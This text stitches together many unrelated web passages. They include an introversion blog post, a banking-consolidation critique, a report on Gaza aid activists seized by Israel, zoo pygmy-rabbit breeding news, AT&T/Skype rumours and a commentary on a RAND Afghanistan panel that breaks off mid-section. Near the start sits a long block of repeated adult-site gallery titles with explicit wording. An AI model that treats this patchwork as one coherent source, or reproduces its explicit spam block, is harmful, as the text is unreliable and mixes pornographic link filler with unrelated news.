He says introversion has not been studied in detail yet but says , " If I were to speculate , I think you 'd see less change in introvert personality style . "
So , I am convinced .
My introversion is not shyness , although I do sometimes feel shy .
( I 'm not sure yet under what circumstances I become bashful - more to think about . )
And I speculate that people who claim to have conquered introversion may instead have conquered shyness without actually becoming extroverts -- if they were , in fact , introverts to begin with .
Maybe they were just shy .
--
Thanks for visiting !
There 's lots more going on in The Introvert 's Corner .
Click here to take a look .
My book , The Introvert 's Way : Living a Quiet Life in a Noisy World , is out and about , available for Kindle , Nook , and in the good ol ' dead tree version .
Please join me on Facebook .
Copyright 2009 Sophia Dembling
A Dedication Page To Petite and Small Breasted Girls gallery 810/1076
A Dedication Page To Petite and Small Breasted Girls gallery 810/1076
A Dedication Page To Petite and Small Breasted Girls gallery 391/1076
A Dedication Page To Petite and Small Breasted Girls gallery 391/1076
A Dedication Page To Petite and Small Breasted Girls gallery 94/1076
A Dedication Page To Petite and Small Breasted Girls gallery 94/1076
OPEN INVITATION : FIND THE PEARL and WIN A PRIZE !
CURRENT SPREAD PUSSY , MAY , 2014 gallery 76/221
OPEN INVITATION : FIND THE PEARL and WIN A PRIZE !
CURRENT SPREAD PUSSY , MAY , 2014 gallery 76/221
OPEN INVITATION : FIND THE PEARL and WIN A PRIZE !
CURRENT SPREAD PUSSY , MAY , 2014 gallery 8/221
OPEN INVITATION : FIND THE PEARL and WIN A PRIZE !
CURRENT SPREAD PUSSY , MAY , 2014 gallery 8/221
A Dedication Page To Petite and Small Breasted Girls gallery 598/1076
A Dedication Page To Petite and Small Breasted Girls gallery 598/1076
A Dedication Page To Petite and Small Breasted Girls gallery 108/1076
A Dedication Page To Petite and Small Breasted Girls gallery 108/1076
OPEN INVITATION : FIND THE PEARL and WIN A PRIZE !
CURRENT SPREAD PUSSY , MAY , 2014 gallery 35/221
OPEN INVITATION : FIND THE PEARL and WIN A PRIZE !
CURRENT SPREAD PUSSY , MAY , 2014 gallery 35/221
A Dedication Page To Petite and Small Breasted Girls gallery 9/1076
A Dedication Page To Petite and Small Breasted Girls gallery 9/1076
A picture says a thousand words .
If you like it post it .
gallery 4/171
A picture says a thousand words .
If you like it post it .
gallery 4/171
A Dedication Page To Petite and Small Breasted Girls gallery 483/1076
A Dedication Page To Petite and Small Breasted Girls gallery 483/1076
A Dedication Page To Petite and Small Breasted Girls gallery 280/1076
A Dedication Page To Petite and Small Breasted Girls gallery 280/1076
When you look into their EYES what are they thinking ?
gallery 5/13
When you look into their EYES what are they thinking ?
gallery 5/13
A Dedication Page To Petite and Small Breasted Girls gallery 558/1076
A Dedication Page To Petite and Small Breasted Girls gallery 558/1076
A Dedication Page To Petite and Small Breasted Girls gallery 690/1076
A Dedication Page To Petite and Small Breasted Girls gallery 690/1076
THE ATTACK OF THE KILLER BUTTS !!!
CURRENT May 2014 gallery 239/514
THE ATTACK OF THE KILLER BUTTS !!!
CURRENT May 2014 gallery 239/514
THE ATTACK OF THE KILLER BUTTS !!!
CURRENT May 2014 gallery 221/514
THE ATTACK OF THE KILLER BUTTS !!!
CURRENT May 2014 gallery 221/514
THE ATTACK OF THE KILLER BUTTS !!!
CURRENT May 2014 gallery 63/514
THE ATTACK OF THE KILLER BUTTS !!!
CURRENT May 2014 gallery 63/514
THE ATTACK OF THE KILLER BUTTS !!!
CURRENT May 2014 gallery 78/514
THE ATTACK OF THE KILLER BUTTS !!!
CURRENT May 2014 gallery 78/514
A Dedication Page To Petite and Small Breasted Girls gallery 138/1076
A Dedication Page To Petite and Small Breasted Girls gallery 138/1076
A Dedication Page To Petite and Small Breasted Girls gallery 721/1076
A Dedication Page To Petite and Small Breasted Girls gallery 721/1076
A Dedication Page To Petite and Small Breasted Girls gallery 187/1076
A Dedication Page To Petite and Small Breasted Girls gallery 187/1076
A Dedication Page To Petite and Small Breasted Girls gallery 125/1076
A Dedication Page To Petite and Small Breasted Girls gallery 125/1076
OPEN INVITATION : FIND THE PEARL and WIN A PRIZE !
CURRENT SPREAD PUSSY , MAY , 2014 gallery 45/221
OPEN INVITATION : FIND THE PEARL and WIN A PRIZE !
CURRENT SPREAD PUSSY , MAY , 2014 gallery 45/221
For the love of stockings gallery 45/67
For the love of stockings gallery 45/67
A Dedication Page To Petite and Small Breasted Girls gallery 863/1076
A Dedication Page To Petite and Small Breasted Girls gallery 863/1076
A Dedication Page To Petite and Small Breasted Girls gallery 955/1076
A Dedication Page To Petite and Small Breasted Girls gallery 955/1076
A Dedication Page To Petite and Small Breasted Girls gallery 854/1076
A Dedication Page To Petite and Small Breasted Girls gallery 854/1076
A Dedication Page To Petite and Small Breasted Girls gallery 149/1076
A Dedication Page To Petite and Small Breasted Girls gallery 149/1076
A Dedication Page To Petite and Small Breasted Girls gallery 825/1076
A Dedication Page To Petite and Small Breasted Girls gallery 825/1076
Click here for CLASSIC VIEW .
Here is a shortcut to all Categories at the bottom of this page .
Extreme thumbs galleries have been removed from this page and moved to a category of their own : EXTREME PICS
Last week , Charles Calomiris wrote an op-ed in the Wall Street Journal arguing that big banks are better for various reasons .
Simon wrote last week saying that Calomiris underestimated the political dimension , and that his proposed solution — a cross - border resolution mechanism for large institutions — is the policy equivalent of assuming a can opener .
I wanted to look at Calomiris ’s specific claims .
I think I ’ve already dealt with the myth that banks “ need to be large to operate on a global scale — and they need to do so because their clients are large and operate globally . ”
Calomiris also argues that there are economies of scope ( it ’s better to be big because you can play in multiple businesses ) .
Here ’s his evidence :
“ True , some empirical studies in the field of finance have failed to find big gains from mergers .
But those studies measured gains to banks only , and measured only the performance improvements of recently consolidated institutions against other institutions , many of which had improved their performance due to previous consolidation .
“ Yet even unconsolidated banks have improved their performance under the pressure of increased competition following the removal of branching restrictions , which permitted the consolidation wave in banking .
And when an entire industry is involved in a protracted consolidation wave , the best indicator of the gains from consolidation is the performance of the industry as a whole .
One study of bank productivity growth during the heart of the merger wave ( 1991 - 1997 ) , by Kevin Stiroh , an economist at the New York Federal Reserve , found that it rose more than 0.4 % per year . ”
Note that Calomiris concedes that you can’t find benefits from mergers by looking at merged banks directly ; this is why he falls back on an industry average .
First of all , there must be a joke to be made here about correlation and causality .
Wait , here it is .
Second , 1991 - 97 was only the beginning of the merger wave ; The Riegle - Neal Interstate Banking Act was n’t passed until 1994 .
Let ’s assume that mergers after 1995 would n’t show up in the 1991 - 97 data .
That includes Nations - Boatmen ’s , Nations - Barnett , Nations - Bank of America , B of A - FleetBoston , Chemical - Chase , Bank One - First Chicago , J.P. Morgan - Chase , Wells - First Interstate , Wells - Norwest , and Wachovia - First Union .
Third , I was interested by that statistic , because 0.4 % annual productivity growth from 1991 to 1997 seems like nothing to write home about – labor productivity growth ( the figure you usually read about ) over that period was about 1.7 % per year for the economy as a whole .
So I tracked down the source : Kevin J. Stiroh , “ How did bank holding companies prosper in the 1990s ? , ” Journal of Banking & Finance , Volume 24 , Issue 11 , November 2000 , Pages 1703 - 1745 .
( I ’m not sure if anyone can download the paper or I could only do it because I ’m on the Yale VPN . )
I found out that Stiroh is measuring total factor productivity , not labor productivity , so 0.4 % is better than average for the non-manufacturing sector .
( The economy average was 0.3 % , but the manufacturing sector was 1.9 % , so by implication the non-manufacturing sector was less than 0.3 % . )
So far , so good .
But what does Stiroh say about this productivity growth ?
His main explanation for the productivity growth is not consolidation , but information technology : “ The finding of steady productivity growth , in particular , is important since it is consistent with the idea that the massive investment in new technology is working to improve the performance of the banking industry . ”
This is not proven in this paper , but Stiroh went on to write a bunch of other papers on the link between information technology and productivity .
For example , this paper ( on the entire economy , not just banking ) concludes :
“ IT - producing and IT - using industries account for virtually all of the productivity revival that is attributable to the direct contributions from specific industries , while industries that are relatively isolated from the IT revolution essentially made no contribution to the U.S. productivity revival .
Thus , the U.S. productivity revival seems to be fundamentally linked to IT . ”
That second paper also finds ( Table 2 ) that productivity acceleration — the difference between productivity growth in the 1995 - 99 period relative to the 1987 - 95 period — was lower in finance , insurance , and real estate than in the economy as a whole , including the services sector .
I do n’t know exactly what this means , but at first glance it does n’t look good for banking consolidation .
Going back to the first paper ( the one Calomiris cites ) , what does Stiroh say about bank size ?
“ Despite the strong overall performance , roughly 10 % of costs were due to inefficiency and 30 - 40 % of potential profits were missed .
Moreover , efficiency does not significantly increase with bank size as one might expect if economies of scale are an important determinant of success .
Rather , there are efficient and profitable BHCs in every size class and increased size does not guarantee success . ”
Figures 6 and 7 show that there is no difference in cost efficiency across size classes and that the largest banks actually seem to have lower profit efficiency .
However , Stiroh also says that continuing consolidation seems to offer the possibility of reducing these inefficiencies , so on balance I would say he is slightly positive about size .
Stiroh also has a paper on banks in Switzerland which I did n’t read , but whose abstract says :
“ We find evidence of economies of scale for small and mid-size banks , but little evidence that significant scale economies remain for the very largest banks .
Finally , evidence on scope economies is weak for the largest banks that are involved in a wide variety of activities .
These results suggest few obvious benefits from the trend toward larger universal banks . ”
I wish I had more time to read more of these papers .
It seems to me that Stiroh has done a lot of serious empirical research on banking productivity and finds the evidence mixed — consolidation should be good , but it does n’t really show up in the data .
I have n’t read much of his work ( or talked to him ) and I certainly do n’t want to imply that he is against big banks .
I just think that citing a study he did of the 1991 - 97 period to back up a claim that banking mergers are good is a bit of a stretch .
By James Kwak
British and Irish people are among a group of 21 human rights activists " kidnapped " by the Israeli authorities , campaigners said .
The group were on board an aid boat carrying humanitarian supplies near the Gaza coast when they were seized in international waters , according to the Free Gaza Movement .
The small boat Spirit of Humanity was on its way to deliver medical supplies to Gaza when it was allegedly stopped by Israeli warships yesterday morning with threats of gunfire .
The people on board who were " forcibly " taken to Israel included eight from Britain and Ireland as well as fellow activists from the US , Denmark and the Middle East .
The Foreign Office said it was aware of the reports and was trying to clarify the facts .
A spokeswoman said last night : " We would be concerned if the stories of the Israeli Navy boarding the boat in international waters were true .
" We have made it clear to Israel that we are very concerned for the safety of British nationals . "
Nobel laureate Mairead Maguire and former US Congresswoman Cynthia McKinney were among the group on the ship , taking aid to Gaza in the aftermath of its bombardment by Israel .
Their fellow activists included Ishmahil Blagrove , a Jamaican - born journalist based in the UK ; Derek Graham , an Irish electrician : the ship 's captain Denis Healey from the UK ; British journalist Fathi Jaouadi ; Alex Harrison , a British woman ; Theresa McDermott from Scotland ; Adnan Mormech from the UK ; and Ms Maguire .
A friend of Mr Mormech , 30 , from Rusholme , Manchester , said she was worried for the activist , who recently completed a master 's degree at Manchester Metropolitan University .
Sarah Gould , 27 , a student from London , said : " I 'm very concerned for his safety as apparently the Israeli boats were threatening to shoot at them .
" The group was prepared but obviously they were extremely vulnerable - a boat of unarmed civilians surrounded by Israeli military vessels .
" They put themselves at an incredible amount of personal risk because they feel so strongly about this as absolutely necessary .
" Adie is now not going to get that opportunity to do that work that is so very much needed . "
Mr Mormech 's MP Gerald Kaufman hopes to raise what has happened during Prime Minister 's Questions today , the Free Gaza Movement said .
The group said their boat was carrying medical and reconstruction supplies as well as children 's toys and could not possibly constitute any sort of threat to Israel .
The vessel was searched and received security clearance from the Cypriot Port Authorities before departing and never approached Israeli waters , they said .
Ms Maguire , winner of a Nobel Peace Prize for her work in Northern Ireland , said in a statement : " The aid we were carrying is a symbol of hope for the people of Gaza , hope that the sea route would open for them , and they would be able to transport their own materials to begin to reconstruct the schools , hospitals and thousands of homes destroyed during the onslaught . "
Her fellow passenger Ms McKinney , a former US presidential candidate , said : " This is an outrageous violation of international law against us .
Our boat was not in Israeli waters , and we were on a human rights mission to the Gaza Strip .
" We 're asking the international community to demand our release so we can resume our journey . "
Huwaida Arraf , chair of the Free Gaza Movement , said : " No one could possibly believe that our small boat constitutes any sort of threat to Israel .
" We carry medical and reconstruction supplies , and children 's toys .
Our passengers include a Nobel laureate and a former US congressperson .
" Our boat was searched and received a security clearance by Cypriot Port Authorities before we departed , and at no time did we ever approach Israeli waters . "
She added : " Israel 's deliberate and premeditated attack on our unarmed boat is a clear violation of international law and we demand our immediate and unconditional release . "
The UK wants Israel to open the crossings into Gaza for humanitarian aid and has " repeatedly " raised this issue with the Israeli government , the Foreign Office said .
British people are advised not to travel to Gaza , including its waters .
Belfast Telegraph
Pop memorabilia collector Mark Hayward came across rare footage of the Beatles at an auction in the late 1990s .
It shows the band performing in Blackpool in August 1963 as Beatlemania began to kick in .
Now Mark Hayward is releasing the footage to the public for the first time , as part of his forthcoming book and DVD , " The Beatles , On Camera , Off Guard 1963 - 1969 " .
FINALLY !
I hear we ’re all living in a women ’s world now .
For the first time , women make up half the work force .
The Shriver Report , out just last week , found that mothers are the major breadwinners in 40 percent of families .
We have a female speaker of the House and a female secretary of state .
Thirty - two women have served as governors .
Thirty - eight have served as senators .
Four out of eight Ivy League presidents are women .
Great news , right ?
Well , not exactly .
In fact , it could n’t be more spectacularly misleading .
The truth is , women have n’t come nearly as far as we would have predicted 25 years ago .
Somewhere along the line , especially in recent years , progress for women has stalled .
And attitudes have taken a giant leap backward .
I never expected that we would be in this predicament .
My generation of professional women took equality for granted .
When I was in college in the 1980s , many of us looked derisively at the women ’s liberation movement .
That was something that strident , humorless , shrill women had done before us .
We were sure we were beyond it .
We were post - feminists .
After all , we lived equally with men .
We felt that when we took our place in society , issues of gender  and race too  would n’t be a factor .
RALEIGH , N.C. --
The Carolina Hurricanes have sued a Raleigh hip - hop artist who produced a song promoting the franchise , saying the man has violated team trademarks .
The federal lawsuit accuses Tyrone Banks of misusing trademarks by referring to the tune as " the official Carolina Hurricanes song " and wearing a Hurricanes jersey in promotional material .
Banks produced " Carolina Hurricanes " in 2007 and provided a copy of the song to the team , asking the Hurricanes to play the music during games , according to court documents .
The lawsuit said the Hurricanes did use the song during games and short segments of it appeared in a television ad and online video .
Banks also received complimentary tickets to a game , when the Hurricanes played the song , highlighted Banks in the audience and displayed his name on the scoreboard .
" Carolina Hurricanes .
That 's our team , say the name , " the song 's chorus repeats .
But the Hurricanes say Banks is promoting sales of the song in a way that would incorrectly suggest an affiliation between him and the team .
The Hurricanes sent Banks a cease - and - desist notice in February and he responded by removing the term " official " or " anthem " from his Web site and added disclaimers , according to the suit .
But the Hurricanes complained that Banks is still seen wearing a Hurricanes jersey in promotional material and said the franchise has been damaged by the unauthorized use of trademarks .
Neither Banks nor the Hurricanes immediately responded to messages from The Associated Press seeking comment .
The lawsuit filed on Friday said Banks has demanded compensation for the song , claiming that he authorized use of the music only during games so long as the team displayed his name , song title , and name of his record company while the song was playing .
In an unusual move for a Broadway show , the producers of the musical “ Hair ” announced on Monday that they were canceling the Sunday matinee on Oct. 11 so that the cast could join the National Equality March that day in Washington in support of gay - marriage rights .
Oskar Eustis , the artistic director of the Public Theater , a producer of “ Hair , ” said that the decision reflected the spirit of the musical .
“ Its message of change and hope and inclusion is one we try to live , not just preach , ” he said in a statement .
Monday ’s announcement was made at a rally in Los Angeles after the “ Hair ” cast taped a segment there for “ The Tonight Show With Conan O’Brien . ”
A spokesman for “ Hair ” said the producers were adding a performance for Monday , Oct. 5 . People who have tickets to the Oct. 11 matinee can exchange them for another performance .
Unlike most rabbits , the Columbia Basin Pygmy Rabbit did not breed prodigously in captivity , partially due to inbreeding within the tiny wild population .
As a result they were cross bred with Idaho Pygmy Rabbits and subsequent breeding efforts have been more successful .
Learn more by clicking on " Continue reading ... " below or at the Washington State Department of Fish and Wildlif e .
This year the Oregon Zoo welcomed 26 of the little guys , bringing this year 's total to 73 baby bunnies ( kits ) among participating breeding facilities .
Color is added to the ears in the pictures below so zoo staff can tell the kits apart .
Columbia Basin Pygmy Rabbits are the world 's smallest and among the rarest .
Native only to a single area of Washington State , this once isolated population of Pygmy rabbits usually weighs less than a pound in adulthood and was declared extinct in the wild in the '90s , after the remaining 14 bunnies were scooped up and taken into the equivalent of bunny protective custody .
OREGON ZOO NEWS
For Immediate Release
October 12 , 2009
Contacts : Bill LaMarche 503-220-2448 ( office ) or 503-497-5812 ( pager )
Linda D'Ae - Smith 503-220-5716 ( office ) or 503-441-7573 ( pager )
Note to editor :
To view video of baby pygmy rabbits getting weighed and measured , visit www.oregonzoo.org/VideoArchive/Rabbits_babyPygmy.htm.
OREGON ZOO SEES SUCCESSFUL BREEDING SEASON FOR RARE RABBITS
Zoo produces more than 25 Columbia Basin pygmy rabbit kits this season
PORTLAND , Ore. --
After a difficult start to the breeding season , the Oregon Zoo has welcomed 26 endangered Columbian Basin pygmy rabbit kits , raising this year 's total to 73 kits among participating breeding facilities .
The zoo -- in collaboration with the Washington Department of Fish and Wildlife , U.S. Fish and Wildlife Service , Washington State University and Northwest Trek -- is diligently working to bring this endangered Northwest species back from the brink of extinction .
Huge declines in both the number and size of rabbit populations prompted the Washington Department of Fish & Wildlife to list the Columbia Basin pygmy rabbit as a state - endangered species in 1993 .
Following continued population loss , biologists removed the remaining 14 rabbits from the wild and started an emergency captive - breeding program similar to the one used for California condors .
" In the past , zoos have spread their conservation efforts all over the world , particularly in tropical areas , " said Michael Illig , assistant curator in charge of the zoo 's rabbit program .
" While these efforts are extremely important , there is a tendency to ignore our own back yards .
At the Oregon Zoo , we believe efforts in our own region more effectively engage our visitors and constituents in conservation actions . "
The zoo's involvement with pygmy rabbit breeding began in December 2000 , when Idaho pygmy rabbits arrived as surrogates for the vulnerable Columbia Basin rabbits .
Zoo staff constructed behind - the - scenes habitats full of loose soil and tubes , which served as hiding places for the reclusive rabbits .
Nest boxes were also constructed and fitted with infrared video cameras , allowing scientists to study the animals ' activity patterns and learn behavioral nuances .
In 2001 , the research paid off , and the Oregon Zoo became the first zoo in the world to successfully breed Idaho pygmy rabbits .
Its program for Columbia Basin pygmy rabbits became increasingly successful through the 2006 breeding season , yielding a record number of births and 32 surviving kits .
The zoo shared its research and breeding protocols with WDFW , facilitating the establishment of pygmy rabbit breeding facilities at Northwest Trek and WSU in Pullman .
Pygmy rabbits are the only North American rabbits that dig burrows and live in a sagebrush habitat .
Jack rabbits , which also live in sagebrush communities , are actually hares , not rabbits .
In the wild , pygmy rabbits eat sagebrush almost exclusively in the winter ; during summer , they eat a more varied diet .
They may have two to four litters of about two to six kits during the spring and summer breeding seasons .
Population decline is widely attributed to predation and habitat loss caused by agricultural development and wildfires .
" In the future , " Illig said , " we have to do a better job of protecting animals and their habitats before situations become dire . "
All Eyes on AT&T at CTIA ; Will Ma Bell Let Skype Onto Its Networks ?
Is AT&T about to announce Skype and Google Voice will run on its mobile network via Apple 's iPhone ?
That 's the buzz ahead of a wireless industry conference that begins Wednesday in San Diego .
One source close to the thinking of AT&T executives said the company has been deliberating the decision for weeks and that top executives have said they were close to accepting voice over Internet services on all AT&T phones , including the iPhone .
The source spoke on the condition of anonymity because a decision had n't been officially announced .
Skype currently operates on the iPhone through WiFi access , but not on AT&T's 3G mobile network .
AT&T has declined to comment on the rumors .
It says it was Apple 's decision to deny or permit applications like Google Voice and other VOIP providers on the iPhone .
VOIP applications run on other phones on AT&T 's 3G network , but not the iPhone .
Apple has said in a letter to the FCC that it has n't blocked Google Voice or other voice services , saying it is still in the process of evaluating those applications on the iPhone .
Google , meanwhile , in its own letters to the FCC says Apple executives flatly informed Google they would block Google Voice .
Skype also said its service has been blocked from the iPhone .
As the debate over an FCC proposal for stronger net neutrality rules escalates , some industry sources speculate that the phone giant may make an announcement at the CTIA conference that shows it is moving toward more open policies on its wireless network .
The proposed rules would prohibit firms like AT&T , Verizon , Comcast and Time Warner from blocking applications on their telecom , cable and mobile networks .
AT&T Mobility CEO Ralph De La Vega and FCC Chairman Julius Genachowski will give keynote speeches Wednesday .
On Monday , Vonage announced it would offer its voice service on the iPhone and RIM's Blackberry , perhaps a small step toward a loosening of policy at the carrier .
It would be the first voice application on the iPhone that would work on WiFi networks and AT&T 's cellular networks .
A spokesman for Vonage said the service would be a voice service , not a data service , and would n't run on AT&T 's 3G data network .
Instead it would offer cheaper calls internationally .
Includes Even More Incredible Machine , The Incredible Machine 3 ( contains all levels from The Incredible Machine 2 ) , Contraptions and Even More Contraptions
Solve wacky puzzles with even more wacky solutions , using absolutely crazy contraptions
Countless challenges to keep you busy for many days to come
Do you remember watching with amazement when those cartoon heroes constructed machines to catch someone or start something ?
Those very complicated Rube Goldberg - like ones with knives , toasters , anvils etc ?
Or did you ever wonder how it would feel to construct a mouse - powered device to cook some eggs and launch a rocket ?
Well , the answer is here !
Build monkey or mouse - powered machines , use lasers and fire fireworks , start fires using a bowling ball and flint , throw things with anti gravity platforms or a jack - in - the - box or crack open an aquarium with a cat , mouse , alligator , cannon , cheese and more !
The White Man ’s Burden , a phrase immortalized by English poet Rudyard Kipling as an excuse for European - American imperialism , was front and center Thursday morning at a RAND - sponsored discussion of Afghanistan in the Russell Senate Office Building .
The agenda was top - heavy with RAND speakers , and the thinking was decidedly " inside the box " — so much so , that I found myself repeating a verse from Kipling , who recognized the dangers of imperialism , to remind me of the real world :
It is not wise for the Christian white
To hustle the Asian brown ;
For the Christian riles
And the Asian smiles
And weareth the Christian down .
At the end of the fight
Lies a tombstone white
With the name of the late deceased ;
And the epitaph drear ,
A fool lies here ,
Who tried to hustle the East .
With a few notable exceptions , the RAND event offered conventional wisdom to a fare - thee - well .
There was a certain poetic justice that President Carter ’s national security adviser Zbigniew Brzezinski , who has chaired RAND ’s Middle East Advisory Board , was chosen to keynote the proceedings .
As national security adviser under President Carter , Brzezinski thought it a good idea to mousetrap the Soviets into their own Vietnam debacle by baiting them into invading Afghanistan in 1979 , the war that was the precursor to the great - power quagmire in Afghanistan now , three decades later .
On Thursday , Brzezinski disclosed that he had advised the Bush / Cheney administration to invade Afghanistan in 2001 , but insisted that he told Defense Secretary Donald Rumsfeld that the U.S. military should not stay " as an alien force " once American objectives were achieved .
Exuding his customary confidence , Brzezinski first addressed — and ruled out — several " No ’s , " the things that the U.S. must not do :
- Withdrawal is " not in the range of policy options . "
- The U.S. must not repeat the Soviet experience in going it alone , but rather must " use all our leverage " to make NATO ’s commitment stick .
- The U.S. should not neglect the need to include " Islamic " groups in the coalition .
Brzezinski offered a much longer litany of " Yeses " — but his list was disappointingly bereft of new ideas .
Indeed , it was notable only for his insistence that the U.S. ought to be more actively engaged in promoting a north - south pipeline through Afghanistan to the Indian Ocean .
He said , for example , that India needs access to the resources of central Asia , an area especially rich in natural gas , as well as oil .
Without batting an eyelash , Brzezinski noted that within three months the war in Afghanistan will be the " longest war in U.S. history , " and warned that the United States could be " bogged down there for another decade or so . "
At the same time , he argued , the world impact of an early U.S. departure " would be utterly devastating . "
Quagmire , anyone ?
Questioned about growing opposition to the war , he conceded condescendingly that " public fatigue " is understandable , but expressed confidence that adoption of his recommended policies would be " persuasive " enough to turn public opinion around .
Outsiders Impinge
One must give RAND credit for inviting a few outsiders whose remarks came closer to reflecting reality .
Former national intelligence officer for the Middle East , Paul Pillar , and Harvard professor Stephen Walt offered observations that , though eminently sensible , somehow seemed oddly out of step — " out of the box , " as we say in Washington .
Pillar asked if what the U.S. was doing in Afghanistan is enhancing the security of the American people .
Are the costs justified , given the amount of change and the " direction of change " that U.S. policies can be realistically expected to produce ?
Even if the U.S. and NATO effort is , as they say , " properly resourced , " large parts of Afghanistan will remain open to the Taliban , and perhaps al Qaeda — not to mention alternative locales like Somalia and Yemen .
And then there are the counterproductive consequences .
It is a given , said Pillar , that sending more troops perceived as occupation forces will — more than any other step — bring more and more recruits to the Taliban .
As for the cost , Pillar cited the recent congressional testimony by Stephen Biddle , a defense policy fellow at the Council on Foreign Relations .
Biddle , though supportive of Gen. Stanley McChrystal ’s counterinsurgency approach , said it would incur " Iraq - war - scale cost for three to five years . "
Pillar asked if that kind of anticipated cost was worth what he suggested would be " at best , a slight reduction in the danger from terrorism . "
Whether the game is worth the candle is , he said , the calculation that the President has to make .
No Alternative ?
Stephen
Walt picked up on Pillar ’s themes , pleading for a realistic assessment of benefits against cost .
As for U.S. troop casualties , 850 have already been killed .
At a rate of 50 deaths a month , five more years would bring 3,000 dead — not to mention the many thousands more who have been wounded .
And the longer the United States stays , the more it looks like a foreign occupier and the more various Afghan factions are pushed together by giving them a common enemy .
Plus , al Qaeda will have a safe haven — in Pakistan , Somalia , Yemen , even Europe — no matter the degree of " success " the U.S. achieves in Afghanistan .
Walt opined that it is the epitome of hubris for the U.S. to take on the monumental task of " social engineering " the 200 million people in Afghanistan and Pakistan , and that the chances of succeeding are " not great . "
He questioned the disproportionate attention in resources directed toward Afghanistan when there is little reason to send more U.S. troops , except for the fact that there are already U.S. troops there with too much to handle .
Walt pointed also to a significant " opportunity cost " in the drain on President Barack Obama ’s time , noting there are lots of other problems — domestic as well as foreign — that crave his attention .
Remarkably , among virtually all the speakers there was broad consensus that Brzezinski ’s first No - No would prevail — that is , that no U.S. troop withdrawal will be in the cards .
Walt put it bluntly , saying the President " painted himself into a corner " last spring and would probably not be able to change course to address " one of the world ’s most intractable problems " in a sensible way .
The Harvard professor predicted that in just a few years the Obama administration will look back with huge regret on how badly it erred .
The Cato Institute ’s Christopher Preble took strong issue with the notion that " a country like ours would have no alternative " to escalation .
He , too , asked if adding to the U.S. presence in Afghanistan is essential to U.S. national security .
Or , Preble wondered , has the conflict there simply become an interest in itself — " that we must win this war because it is the war we are in ? "
He , too , gave U.S. policy makers a failing grade on " the cost - benefit test . "
RAND and the Establishment
The biggest surprise for me came in the remarks of well - respected diplomat James Dobbins , director of RAND ’s International Security and Defense Policy Center .
Dobbins provided no supporting data or reasoning to support what seemed — to me , at least — to be scare tactics .
His words were the kind that a diplomat would use in selling a policy aimed at avoiding the worst .
Addressing the possibility of U.S. departure from Afghanistan , Dobbins predicted a long list of calamities : civil war ( as if one is n’t already under way ) , the involvement not only of Pakistan but of Iran , Russia and China ; millions of refugees , widespread disease , negative economic growth , increased extremism and use of Afghanistan for more terrorism .
As for the administration ’s public posture , Dobbins pointed to a need to " expand the explanation for our presence in Afghanistan , " so that the rationale will appear more commensurate with an increased commitment " — read , more troops justified by more rhetorical flourishes .
Although Dobbins performed yeoman service , for example , in securing Iranian cooperation in setting up the Karzai government in Kabul , his experience with Asian insurgencies appears paper - thin .
I was painfully reminded of this by his gratuitous remark that " in Vietnam we had neutralized the Viet Cong " ( sic ) , and only when the North Vietnamese came into the fray , and the U.S. commitment slackened , did we lose that war .
With that faux history as background , it is less surprising that Dobbins would tout , as he did , the " Powell doctrine " of overwhelming force and advocate for a still deeper U.S. commitment in Afghanistan , to be accompanied by a more persuasive rationale to explain it .
Professor
Walt pointed out that , applying the insurgent - to - population ratio Dobbins has used for Bosnia , 600,000 troops would be needed to defeat the insurgents in Afghanistan .
RAND veteran and former U.S. ambassador to Afghanistan , Zalmay Khalilzad , addressed the public perception problem regarding the Afghan war with unusual candor : " People do n’t believe we know what we ’re doing . "
Still , endorsing the Brzezinski No-No dictum , Khalilzad said that " no serious person " would contemplate U.S. withdrawal thus enabling " extremism " to prevail .
Khalilzad argued for playing to U.S. strengths with a " purchasing power " approach — the United States comes up with the money to pay potential or actual insurgents more than they earn fighting for the Taliban .
And he stressed that the U.S. needs to expand Afghan forces .
Speaking last , Senate Armed Services Committee Chairman Carl Levin , D - Michigan , also emphasized the need for building up Afghan forces , as the administration considers increasing the U.S. troop presence in Afghanistan .
Levin spoke of the need for a 400,000 - strong Afghan army and police force by 2012 , trained by U.S. and NATO specialists .
Training the Indigenous : Panacea or Mirage ?
I am reminded of what former CENTCOM commander , General John Abizaid , described to the Senate Armed Services Committee three years ago as a " major change " in the Iraq war — namely , new emphasis on training Iraqis .
The final returns are not yet in for Iraq , but in my experience this is almost always an unfruitful exercise , as many of us learned from Vietnam .
Been there ; done that ; should have known that .
Three months after John Kennedy ’s death , Defense Secretary Robert McNamara sent President Lyndon Johnson a draft of a major speech McNamara planned to give on defense policy .
What follows is a segment of an audiotape of a conversation between the two on Feb.
25 , 1964 :
Johnson :
Your speech is good , but I wonder if you should n’t find two minutes to devote to Vietnam .
McNamara :
The problem is what to say about it .
Johnson : I ’ll tell you what to say about it .
I would say we have a commitment to Vietnamese freedom .
We could pull out there ; the dominoes would fall and that part of the world would go to the Communists .
…
Nobody really understands what is out there .
…
Our purpose is to train [ the South Vietnamese ] people , and our training ’s going good .
McNamara :
All right , sir .
But the Vietnamese training was n’t " going good . "
Before long , half a million American troops were in Vietnam trying to save South Vietnam ’s government .
It is a forlorn hope that unwelcome occupation troops can train indigenous soldiers and police to fight against their own brothers and sisters .
That the British also seem to have forgotten these lessons , along with some of Kipling ’s cautionary poetry about the risks of imperialism , is really no excuse .
If President Obama is depending on the RAND folks and embedded neo-con pundits like the Washington Post ’s David Ignatius , we are in trouble .
In Friday ’s column Ignatius appeals for more troops " to continue the mission , " as the President and his advisers attempt to figure out what the mission should be .
As I sat at the RAND event on Thursday , I could not help wondering what would be the judgments of my former colleagues in the intelligence community on these key issues ?
Specifically , what might a National Intelligence Estimate on Prospects for Afghanistan say ?
NIEs are the most authoritative genre of analytical product , embodying key judgments on important national security issues .
They are coordinated throughout the 16 - agency intelligence community and then signed by the Director of National Intelligence in his statutory capacity as chief intelligence adviser to the President .
An NIE can , and should , play an important role .
An estimate on Iran ’s nuclear program , for example , given to President George W. Bush in November 2007 , helped derail plans by Vice President Dick Cheney and White House adviser Elliott Abrams for war on Iran .
The most senior U.S. military officers had realized what a debacle that would be and insisted that this NIE ’s key judgments be made public .
They anticipated , correctly , that public knowledge that Iran had stopped working on developing a nuclear warhead in 2003 ( and had not resumed such work ) would take the wind out of Cheney ’s , Abrams ’ , and Israel ’s sails .
Bush and Cheney were not pleased ; but the NIE helped stop the juggernaut toward war with Iran .
There ’s Always an NIE , Right ?
As one of the intelligence analysts watching Vietnam in the Sixties and Seventies , I worked on several of the NIEs produced before and during the war .
All too many bore this title : " Probable Reactions to Various Courses of Action With Respect to North Vietnam . "
Typical of the kinds of question the President and his advisers wanted addressed : Can we seal off the Ho Chi Minh Trail by bombing it ?
